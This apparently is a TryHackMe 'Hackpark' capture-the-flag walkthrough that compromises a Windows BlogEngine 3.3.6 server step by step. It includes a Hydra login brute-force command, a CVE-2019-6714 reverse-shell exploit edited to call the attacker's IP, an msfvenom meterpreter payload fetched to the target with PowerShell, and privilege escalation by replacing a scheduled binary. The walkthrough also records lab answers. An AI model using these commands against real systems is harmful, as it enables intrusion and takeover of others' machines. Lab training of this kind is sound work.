Tryhackme walkthrough: Hackpark

Windows escalation privilege using multiple tools

hackpark walkthrough

Steps to completing this challenge

  • Reconnaisance
    Use nmap to find out open ports.
  • Discovery and scanning
    Perform directory traversal to uncover more attack surface using Dirbuster or Dirb. Check  Check for software vulnerabilities.
  • Gain initial foothold
    Exploit uncovered vulnerabilities.
  • Establishing perstistence
    Start a meterpreter shell. Upload privilege escalation exploits
  • Escalating privileges
    Execute privilege escalation exploit. Run root shell.
hackpark walkthrough

1. Reconnaisance

You can either check out the target machine's IP address or conduct an nmap scan to find out what services are there.

What is the name of the clown displayed on the frontpage?
pennywise

2. Amazing blocks

Perform an nmap scan with an option to check for software versions (-sV) and to skip host discovery (-Pn).
nmap -sV -Pn [target IP address]

Nmap Scan
Dirbuster

3. Traverse directories

Start dirbuster by typing dirbuster. Choose one of the pre-set wordlists. I used directory-list-2.3-medium.txt in this instance.
The usual location for these wordlists are at /etc/share/wordlists

Dirbuster running

4. Dirbuster running

Dirbuster brags about its progress both on its graphical interface and on the command line. One directory found worth looking into is

http://[IP address]/admin

check it out on your browser

BlogEngine Creds

5. BlogEngine

We see that the website is use BlogEngine as its content management system. Let's do a Google search to see what default credentials are and if we can use them.

Default credentials

6. BlogEngine default

Apparently, it uses both admin for default username and password. 
Using it doesn't allow us access so now we make an attempt to find out what the password is. We used BurpSuite to help us with this one.

7. Use BurpSuite and FoxyProxy

Toggle FoxyProxy on your browser to route traffic to 

BurpSuite capture

8. Capture HTML traffic sent when logging in

With BurpSuite intercepting traffic, we can take a closer look at what instructions are being sent to the website. 

We're going to use that long cryptic link to brute force the password using Hydra.

Inside the Request box, we're interested in lines 1 and line 16. Line 1 contains the link we're sending the credentials and the HTML command. In this case it's  POST /Account/login.aspx?ReturnURL=%2Fadmin

Line 16 shows the specific parameters returned by the website. Somewhere in that long text we'll use to specify how Hydra is going to fuzz the username and password.

9. Using Hydra

You can always type hydra --help in the command prompt to find out how to use it. In this example, we are going to post this command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.84.88 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=p52E5Ou%2FrrWaZJfz92Gx%2FfbpTzKoVM6sywhHUacCZjGLdRonH5QTP1mNXo6Jq1zqGPSjCjx1GW0JD3uK%2FA%2FhRbMYeIQe7X43l9h64%2BmsJm76y2cLnjW7pz4Ryn7HB35fO5iQCx4hkngHGjZYvU1b293j5U%2FrW%2B5mTebe5NHY%2Fp%2FSpmjkwJAQBJ%2FnuqJaZHMqT%2BBW5S2oR3KDpXHmcfY91thBwTqi9%2BSMnB8BZ5l5OkdYDiUlxFHzFlq5W0ursJgtX3ZSfAueXH4mX3fOaAPavgRDeNtIWPWXK1GGM0ZY93VGzHFQhU2ME1rtOZUhVvaFBcMLcvbBY%2FMO4DlZ0Ltr82UAGwz50SoDmVER8E8bc60p%2FXnd&__EVENTVALIDATION=4hWUNiJYjd%2F3Rm1qa7k9GUH%2FRDbBtz2hM7GNL%2BsyQ3QhWVe%2B0ezaK%2FIOB%2B7oJ9bQnn5xzEjvWhAwKaiW5y%2BnI3DthkRl8IRJH61NfmT9GgSZGcnliZMy5%2FrXhlHVtTDzsRkW35dolvtg71GPDhdooRXWAolAvwPL5WJ7hq4wfk%2Fn1dND&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -vv

Explanation
-l admin: Hydra will not brute force the username and it will stick with using admin
-P /usr/share/wordlists/rockyou.txt: Tell Hydra what password list you are using
10.10.84.88: The IP address of the machine you're attacking
http-post-form: How the website likes to receive usernames and password
^USER^: This tells Hydra to use the username you provided above, which is admin
^PASS^: Tells Hydra to use the password you provided earlier, which is a wordlist. Hydra knows what to do with it.

Hydra completed

Hydra figures out the password: 1qaz2wsx

10. Use the credentials we found

Go to http://10.10.84.88/admin. Use the IP address of your target machine and enter admin: 1qaz2wsx

Backend

11. Backend Access

We now have access to the administrator panel of the blog. We can create, edit, and delete posts. We can also upload files, including a possible exploit we can use to compromise the computer.

BlogEngine 3.3.6

12. About the Blogging Software

Snoop around. Click the About section of the software they are using and we can see it's BlogEngine 3.3.6. We can use that information to find any existing vulnerabilities to this specific software and version.

Exploit

13. Exploit Database

Thanks to some ultra-nerds. There exists a website where we can search and download exploits real hackers have already created. Go to https://www.exploit-db.com for that.

Search for blogengine 3.3.6. We are given a handful of possible exploits. We're going to pick the one created by Dustin Cobb on February 12, 2019.

Exploit contents

14. What is the CVE? CVE-2019-6714

Obtain the exploit

Raw format. Copy and paste to your text editor.

15. Download the exploit

- You can view the exploit in its raw format or
- Download the file

46353 Instructions

Exploit is named 46353

16. Follow the instructions

The first lines of the exploit outlines how to use it
1. Edit the exploit 46353

2. Tell the exploit to talk to your computer by...

3. Locating this line:
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445))

4. Change the 10.10.10.20 to your IP address

5. Change 4445 to 4444 (or whatever you want, just remember it when you establish a listening port)

6. Save the file as PostList.ascx.cs

ip a

Your own IP address

17. Find out your IP address

If you don't know your IP address, or your tunneling IP address, enter ip a on your command prompt.

Then use it to modify the exploit file.

Admin backend

18. Go back to the blog backend

Go back to your browser. Click the existing post and edit it. We will use that post to upload the exploit PostView.ascx.cs

19. Upload the exploit

This video shows how to upload the exploit

Netcat listening

20. Prepare your machine to receive communication from the hacked website

We'll use Netcat to wait for a connection from the target machine. Enter this on your command prompt:

nc -nvlp 4444

Explanation
nc: Netcat

-n: do not resolve names
-v: be verbose when a connection happens
-l: listen for a connection at...
-p: port number...

4444: This is the port you specified on #16 above.

21. Execute the exploit

Open a new browser tab. Point your browser to [Target IP]://?theme=../../App_Data/files. In this case it will be
10.10.84.88://?theme=../../App_Data/files

Your browser tab will look like it has frozen or has not completed loading. Ignore it. Go back to your command prompt and check Netcat

whoami

whoami reveals iisapppool\blog

22. Connection established

Netcat will displhay when a connections has reached out successfully. You will see a blank prompt. This target machine is a Windows machine so listing the directory contents will be the command dir.

whoami

iisapppool\blog

23. Who is the webserver running as?

Type whoami on the command prompt to find out the username or identity of the machine we compromised

create meterpreter shell


24. Escalate the privilege by creating a meterpreter shell

25. msfvenom -p /windows/meterpreter/reverse_tcp LHOST=10.9.2.209 LPORT=4445 -f exe > shell.exe

The machine is compromised. However we are not root, and that's what we want so we get ALL the privileges. For that, we will create a meterpreter shell to upload into the compromised machine using the command msfvenom. Explanation below

/windows/meterpreter/reverse_tcp: we will use a reverse connection using the protocol TCP

LHOST=10.9.2.209: Local host, which is your IP address. You determined that earlier using the command ip a as shown on step 17

LPORT=4445: Another listening port. Remember 4444 is already being used on your current connection.

-f exe > shell.exe: Create an executable file named shell.exe

Python http server

26. Find a way for the target machine to download the exploit we created

It's a good thing Python got that covered. Inside the command prompt you used to create the meterpreter shell, type this command:

python3 -m http.server 8000

This will start an http server accessible on port 8000. To verify your HTTP server, start a new browser tab and go to [your IP address]:8000 and in this case, it'll be 10.9.2.209:8000

You should see the files you have where you created shell.exe.

Access the meterpreter shell

powershell download

27. Download the meterpreter shell using powershell

From the command prompt at the target machine, enter the command:

powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

This is telling your machine to use powershell to download the file located at your web server 10.9.2.209:8000/shell.exe and save it on your C:\Windows\Temp\ directory.

C:\Windows\Temp\shell.exe

28. Verify shell.exe has been downloaded

Type these

cd c:\windows\temp\

and then

dir

You should now see shell.exe inside the C:\Windows\Temp folder.

msfconsole

msfconsole starting

29. Set the conditions to receive the meterpreter shell communication

The Meterpreter shell works with Metasploit. We will start Metasploit before executing the shell.exe on the remote machine. Start it by running:

msfconsole

Exploit Multi Handler

30. Choose the meterpreter shell handler in Metasploit

Within msfconsole, we will use the exploit multi handler. Type

use exploit/multi/handler

msfconsole options

Set handler options

31. Set handler options

We have to set the proper options so shell.exe will communicate correctly with our Metasploit listener. Enter:

show options

set LHOST [YOUR IP Address] and in this case
set LHOST 10.9.2.209

set LPORT 4445

We are telling MSF to listen on port 4445. Remember we told shell.exe to talk to 10.9.2.209 on port 4445.

Verify options

32. Verify options are correct

You don't have to do this but it's good practice to do so.

32a. Execute the Metasploit listener. Enter:

run

33. Execute the exploit from the target machine

Running shell.exe from the target machine will start the meterpreter shell. It will communicate with Metasploit. It'll allow us to do more. Go back to the command prompt window running Windows on the remote machine.

Navigate to C:\Windows\Temp if you're not there yet.
cd C:\Windows\Temp

Run shell.exe. Enter:
shell.exe

Reverse shell

Started reverse TCP handler on 10.9.2.209:4445

34. Check for a new connection

Go back to your Metasploit prompt window.

You should see the command run when you ran the listener.

And the next line:
Started reverse TCP handler on 10.9.2.209:4445

Sysinfo

35. Start looking around

We can get more info about the compromised machine by typing the command

sysinfo

winPEAS

36. Download winPEAS

winPeas is a program we will run on the remote machine to gather even some more information. What we're looking for is a way to execute an exploit, or a shell in administrator mode. This will allow us to go into restricted folders and access restricted files.

Do a Google search or you can point another browser tab to:
https://github.com/carlospolop/PEASS-ng

Git clone winPEAS

37. Git clone winPEAS

From your hacking machine, navigate to a folder where you want winPEAS to be installed or located. Then clone winPEAS into your machine by copy and pasting the command from github into your command prompt. Type:

git clone https://github.com/carlospolop/PEASS-ng

find winPEAS

38. Explore PEASS-ng

Now that the software has been cloned. Look around what it is. winPEAS is just one of its components. It's a tool used to gather info about Windows machines. It'll have other utilities for other systems. Type these commands:

cd PEASS-ng

cd winPEAS

ls

You will see that winPEAS is simply a .bat file. It's a Windows file that contains a list of commands it should execute.

39. Make winPEAS downloadable

Copy winPEAS.bat to the folder where you are hosting your files on the Python web server you started on Step #26. 

powershell again

40. Download winPEAS using PowerShell

Now that we're hosting winPEAS and it's accessible to the target machine, we will download it.

Go to to your command prompt window running Windows

Enter the PowerShell command
powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"

winPEAS downloaded

winPEAS has been accessed from the web servver

41. Check if winPEAS has been accessed

You should see three lines showing the command it received, the machine's response and the file that has been downloaded

winPEAS confirmation

42. Check out winPEAS from the remote machine

Go back to the command prompt window running the Windows prompt in the remote machine. List the directory contents by entering

dir

Then run it by typing

winPEAS

43. winPEAS in action

winPEAS will look up a lot of information about the target machine. Sit back and enjoy.

44. Go through winPEAS' results

Somewhere in the video above, approximately at the 0:17 mark, winPEAS lists the running processes, or services. These are programs that run in the background. A lot of them are programs that have been executed by the system, which then runs at the system level. The program is called Windows Scheduler running on WScheduler.exe

What service is interesting?
Windows Scheduler or WScheduler.exe

What is the Windows Build? 
Windows 2012 R2 (6.3 Build 9600)



Scheduler

45. Take a closer look at Scheduler

From the Windows command prompt, find the location of the program Scheduler. It is located at

C:\Program Files(x86)\SystemScheduler\

Enter
cd c:\Program Files(x86)\SystemScheduler

46. Poke around the directory

There are two files worth checking out right away -- 20198415519.INI and 20198415519.INI_LOG.txt. To quickly view the contents, enter

type 20198415519.INI

Nothing much there except that it was ran by Administrator. We're on the right track.

type 20198415519.INI_LOG.txt

47. Check out 20198415519.INI_LOG.txt

The reason why we are doing this is looking for a way we can run shell.exe as an administrator. Right now, shell.exe is running with another local account that doesn't have that much authority -- iisapppool\blog as you have done on Step #22.

One of the programs being executed every few minutes is Message.exe. It must have root privileges because Administrator runs it.

48. Replace send in the impostor

We know that Message.exe is being executed every five minutes, we will try if we can replace it.

Rename shell.exe into Message.exe. Then copy or move shell.exe into the folder where Message.exe resides. On your command prompt, enter these

cd C:\Windows\Temp

copy shell.exe c:\Program Files(x86)\WindowsScheduler

cd c:\Program Files(x86)\WindowsScheduler

ren Message.exe Message.bak

ren shell.exe Message.exe





Administrator shell

49. Prepare to receive a connection from the new exploit running as Administrator

We have a current Meterpreter session from the shell.exe executed by iisapppool\blog earlier from Step #22.

We will close that by entering exit.

Then simply running the same command

run

Wait for a few seconds because there is a pause between each Message.exe executions.

50. Receive the new shell connection

You don't have to run the shell command to see the Windows interface. You can poke around using the Metasploit prompt.

51. Look for flags

First, we'll verify that we are running as root or as an administrator.

Enter shell from your Metasploit prompt. This will change the command prompt into a Windows command prompt.

Then run whoami. It will show that you are running as Administrator.

The flags are located in:

C:\Users\jeff\Desktop

C:\Users\Administrator


What is the abnormal service running?
WindowsScheduler

What is the binary you're supposed to exploit?
Message.exe

52. Last question

We can also find the answer when we type sysinfo.


Original Install Time
8/3/2019, 10:43:23 AM

Happy hacking!
Happy hacking!